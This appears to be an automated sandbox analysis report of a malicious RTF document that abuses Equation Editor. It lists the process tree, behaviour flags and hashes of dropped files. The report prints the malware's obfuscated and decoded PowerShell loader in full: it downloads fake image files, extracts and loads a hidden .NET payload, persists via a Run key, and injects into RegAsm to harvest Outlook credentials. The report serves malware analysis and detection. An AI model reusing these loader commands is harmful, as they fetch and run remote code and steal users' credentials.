3000 1876 RegAsm.exe 41 PID 1876 wrote to memory of 3000 1876 RegAsm.exe 41 PID 1876 wrote to memory of 3000 1876 RegAsm.exe 41 PID 1876 wrote to memory of 3000 1876 RegAsm.exe 41 PID 1876 wrote to memory of 3000 1876 RegAsm.exe 41 PID 1876 wrote to memory of 2196 1876 RegAsm.exe 42 PID 1876 wrote to memory of 2196 1876 RegAsm.exe 42 PID 1876 wrote to memory of 2196 1876 RegAsm.exe 42 PID 1876 wrote to memory of 2196 1876 RegAsm.exe 42 PID 1876 wrote to memory of 2196 1876 RegAsm.exe 42 PID 1876 wrote to memory of 2196 1876 RegAsm.exe 42 PID 1876 wrote to memory of 2196 1876 RegAsm.exe 42
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\aa48be12373eee7adb43270e7adde9a854875ceebd5c267fa6bbb79e91ce2030.rtf"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:752
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\greatdaytokiislover.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$leitariga = 'ZgB1AG4AYwB0AGkAbwBuACAARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEARgByAG8AbQBMAGkAbgBrAHMAIAB7ACAAcABhAHIAYQBtACAAKABbAHMAdAByAGkAbgBnAFsAXQBdACQAbABpAG4AawBzACkAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAAPQAgAEAAKAApADsAIAAkAHMAaAB1AGYAZgBsAGUAZABMAGkAbgBrAHMAIAA9ACAAJABsAGkAbgBrAHMAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAAJABsAGkAbgBrAHMALgBMAGUAbgBnAHQAaAA7ACAAZgBvAHIAZQBhAGMAaAAgACgAJABsAGkAbgBrACAAaQBuACAAJABzAGgAdQBmAGYAbABlAGQATABpAG4AawBzACkAIAB7ACAAdAByAHkAIAB7ACAAJABkAG8AdwBuAGwAbwBhAGQAZQBkAEQAYQB0AGEAIAArAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGwAaQBuAGsAKQAgAH0AIABjAGEAdABjAGgAIAB7ACAAYwBvAG4AdABpAG4AdQBlACAAfQAgAH0AOwAgAHIAZQB0AHUAcgBuACAAJABkAG8AdwBuAGwAbwBhAGQAZQBkAEQAYQB0AGEAIAB9ADsAIAAkAGwAaQBuAGsAcwAgAD0AIABAACgAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA3ADUAMwAvADcAMQAzAC8AbwByAGkAZwBpAG4AYQBsAC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwA/ADEANwAwADkAOQAwADgAMwAxADYAJwAsACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA3ADUAMwAvADcAMQA0AC8AbwByAGkAZwBpAG4AYQBsAC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwA/ADEANwAwADkAOQAwADgAMwA1ADAAJwApADsAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEARgByAG8AbQBMAGkAbgBrAHMAIAAkAGwAaQBuAGsAcwA7ACAAaQBmACAAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAgACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAgACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAgAGkAZgAgACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAKQAgAHsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAIAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBQAFIATwBKAEUAVABPAEEAVQBUAE8ATQBBAEMAQQBPAC4AVgBCAC4ASABvAG0AZQAnACkAOwAgACQAbQBlAHQAaABvAGQAIAA9ACAAJAB0AHkAcABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AUwBTAEkASwAvAHIAbABrAC8AcABwAG0AYQB4AC8ANwAwADEALgAzADQAMgAuADUAOAAxAC4ANwA0ADEALwAvADoAcAB0AHQAaAAnACAALAAgACcAMQAnACAALAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAJwAgACwAIAAnAEsASQBTAFMAJwAsACcAUgBlAGcAQQBzAG0AJwAsACcAJwApACkAfQAgAH0A';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $leitariga));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/753/713/original/new_image.jpg?1709908316', 'https://uploaddeimagens.com.br/images/004/753/714/original/new_image.jpg?1709908350'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SSIK/rlk/ppmax/701.342.581.741//:ptth' , '1' , 'C:\ProgramData\' , 'KISS','RegAsm',''))} }"4⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\KISS.vbs5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
-
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\temlvwvkkoowfcwiwjggnbdb"6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2116
-
-
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\dgadnpglywgbqikmnutaqnxskvs"6⤵
- Accesses Microsoft Outlook accounts
PID:3000
-
-
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\oafoohrfueyosogqwfgbbskbtckgwv"6⤵PID:2196
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
67KB
MD5753df6889fd7410a2e9fe333da83a429
SHA13c425f16e8267186061dd48ac1c77c122962456e
SHA256b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA5129d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5e04b41d841b9caddb53f4e6e9340ebf3
SHA159fefd0f735f2f019934ec3d8f9e9ae13480e984
SHA2563eb2faa071346a1c4cba22993d90a5ba530ae197e227b8e44fe888292112584d
SHA512055cddc813520c4c1a671988a18ebbd7fabeaf837cd6fd232348f835a5d1a54cb6f2d2566ae5828ab6965dc25f31c9b5e1a15a10cf1cd6e7531a6c3c0f903535
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize242B
MD5a7be4d705fb91d709ca96fe0d4e8818f
SHA1cbca322e6b7695224c05816fedbea7f1c8dc732a
SHA2563e28cfa385806c50fc2494c6000ec522baa9536d5f62e65839bdf22b41713773
SHA5129803fcf4f013eabd702de5cc6d601e2bc306b49d253c3f384ca3501fd94a63ced207cc47dfbe1aea65827febe4fa780e470d61bd086aa60d8c77ad10392db71f
-
Filesize
175KB
MD5dd73cead4b93366cf3465c8cd32e2796
SHA174546226dfe9ceb8184651e920d1dbfb432b314e
SHA256a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
20KB
MD5a4ffbd374b8d62085a5b092eea1fa31b
SHA1209e7de00208ee975d49a745a7c4895eff4b47d1
SHA25640aafadbb75f610e72d6fea6872a56f04b6c0cffc1e880f63bcf397e3e32ee0f
SHA5120e37a05801eef10ca9c98260949ce40bfb21ae5a3b05a7d6a7e7628023cbd03ecd071762151d0fc319d9b3de8234dbc1096d298b8f078bd5883bf9422bdd4848
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\23M67FD3QQYHPKTFS9GG.temp
Filesize7KB
MD5bfad9661c0ce96fdf5519d8a47e70bd8
SHA170fc7cedc9e9b463c8403d396878d51b944862cb
SHA2561f23ae4122884929505942c1120d7e63b34170971be1c48fda447007a862ef7f
SHA512b2e89620fee0141a50ef35d0b436b24fbda9eeac3f370891db41ae7fd3178da52cfb65e4488b21802449360c0082681f3a0f2690d33397869a888c0b749f835f
-
Filesize
33KB
MD5da24a3f9677942db1e73b0ef5d2011a4
SHA10ee17d73b3e26fe1c8b6680b92c305a4d850685c
SHA25698e179fe22de663f2f6127de1354c0d14609c43ca0e644f320310104585f90ce
SHA51246549a6ee806cf7c48328e80b124928258bed5ad182618c25b4bcbf61173ace8eb502f28ce5bf4dd9ba862d988a1c3a95ec86c9ce539fab6c30318c525138615